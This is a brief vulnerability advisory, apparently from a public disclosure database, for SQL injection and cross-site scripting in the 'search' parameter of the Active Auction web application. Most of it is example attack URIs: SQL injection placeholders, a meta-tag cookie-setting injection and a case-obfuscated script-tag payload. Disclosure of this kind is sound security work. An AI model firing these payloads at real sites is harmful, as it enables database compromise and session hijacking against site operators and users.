Active Auction 'search' Parameter SQL Injection and Cross Site Scripting Vulnerabilities

Active Auction 'search' Parameter SQL Injection and Cross Site Scripting Vulnerabilities

The following example URIs are available:

http://www.example.com/[Path]/search.asp?search='[SQL]&submit=%3E

http://www.example.com/[Path]/stores.asp?search='[SQL]&submit=Search

http://www.example.com/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E

http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E